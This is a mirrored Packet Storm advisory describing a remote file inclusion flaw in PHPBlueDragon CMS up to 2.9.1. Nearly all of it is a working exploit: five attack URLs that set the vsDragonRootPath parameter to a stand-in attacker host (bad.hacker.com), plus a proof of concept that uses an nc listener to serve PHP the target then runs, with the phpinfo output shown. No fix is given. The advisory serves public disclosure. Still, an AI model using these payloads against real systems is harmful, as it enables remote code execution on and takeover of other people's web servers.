Lucene search

K

phpbluedragon-2.txt

๐Ÿ—“๏ธย 27 Jun 2006ย 00:00:00Reported byย shmTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

PHPBlueDragon CMS <= 2.9.1 Remote Code Executio

Show more
Code
`PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/  
  
Affected files:  
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/  
  
Solution:  
  
None  
  
Simple PoC:  
  
nc -l -p 9999  
...  
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/  
...  
$ nc -l -p 9999  
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0  
Host: 192.168.0.xx:9999  
  
HTTP/0.9 200 OK  
  
<?php phpinfo(); ?>  
...  
System OpenBSD xxx 3.9 xxx i386  
...   
  
Credits:  
shm   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report